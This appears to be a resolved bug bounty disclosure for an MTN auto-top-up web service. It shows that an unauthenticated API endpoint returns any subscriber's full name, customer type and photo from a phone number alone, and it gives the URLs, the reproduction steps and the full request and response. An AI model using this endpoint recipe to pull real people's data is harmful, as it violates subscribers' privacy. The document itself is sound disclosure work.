Information Disclosure Leads To User Data Leak
M
MTN Group
Submitted None
Actions:
Reported by
netboy
Vulnerability Details
Technical details and impact analysis
Information disclosure is when a web application fails to properly protect confidential information, which causes revealing sensitive information or data of the users or anything related to users to any third party.
## Summary:
Am able to get any MTN users data such as FULL NAME, CUSTOMER TYPE AND PICTURE.
I can get those data by using only phone number of any MTN users.
VUL URL: https://mtnautotopup.mtnonline.com/autotopup/app/sign-up-phone
VUL URL: https://197.210.3.135/autotopup/app/sign-up-phone
~NOTE: Tested with a Nigeria phone number that belong to me.
## Steps To Reproduce:
1. Visit `https://mtnautotopup.mtnonline.com/autotopup/app/sign-up-phone` or `https://197.210.3.135/autotopup/app/sign-up-phone`
2. Put in a phone number and catch the request via BURP
3. INTERCEPT the request of `GET /vtu-service/api/pwa/pub/get-bio-data/081*******`
4. The response contains Fullname, Customer Type and Picture of the user.
## Supporting Material/References:
VUL REQUEST:
```
GET /vtu-service/api/pwa/pub/get-bio-data/070******** HTTP/1.1
Host: mtnautotopupservices.mtnonline.com
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://mtnautotopup.mtnonline.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mtnautotopup.mtnonline.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
```
RESPONSE:
```
HTTP/1.1 200 OK
Date: Thu, 14 Apr 2022 20:11:05 GMT
Server: WildFly/10
X-Frame-Options: https://mtnautotopup.mtnonline.com, https://mtnautotopupservices.mtnonline.com, https://billable.mtnonline.com, https://mtnautotopup.mtnonline.com, https://mtnautotopupservices.mtnonline.com, https://billable.mtnonline.com
Access-Control-Allow-Credentials: âtrueâ, âtrueâ
Access-Control-Expose-Headers: origin, content-type, accept, Authorization,Access-Control-Allow-Origin, origin, content-type, accept, Authorization,Access-Control-Allow-Origin
Access-Control-Allow-Headers: Access-Control-Allow-Headers, Origin,Accept, X-Requested-With, Content-Type, Access-Control-Request-Method,Access-Control-Request-Headers, Authorization, Access-Control-Allow-Methods, Access-Control-Allow-Headers, Origin,Accept, X-Requested-With, Content-Type, Access-Control-Request-Method,Access-Control-Request-Headers, Authorization, Access-Control-Allow-Methods
X-XSS-Protection: 1; mode=block
Referrer-Policy: origin-when-cross-origin
Access-Control-Allow-Origin: *
X-Powered-By: Undertow/1
Content-Type: application/json
Cache-Control: max-age=0, public, no-cache, private, no-store
Expires: Sat, 16 Apr 2022 20:11:05 GMT
Access-Control-Allow-Methods: PUT, GET, POST, DELETE, OPTIONS
X-Content-Type-Options: nosniff
X-Content-Security-Policy: default-src 'self' *.mtnonline.com
Strict-Transport-Security: max-age=631138519; includeSubDomains
Feature-Policy: vibrate *; usermedia *; sync-xhr *
Access-Control-Allow-Methods: PUT, GET, POST, DELETE, OPTIONS
X-Content-Security-Policy: default-src 'self' *.mtnonline.com
Feature-Policy: vibrate *; usermedia *; sync-xhr *
Connection: close
Content-Length: 295017
{"responseCode":"00","responseDescription":"Successful","firstname":"EXPOSE","lastname":"EXPOSE","othername":"EXPOSE","customerType":"Prepaid","profileImg":"EXPOSE"}
```
NOTE: I replaced the exposed data with EXPOSE.
## Impact
An attacker can retrieve any users data (like full name, Customer Type, and Picture) by just using the victim phone number.
This can be use for information gathering about someone for malicious use or criminal activity.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Information Disclosure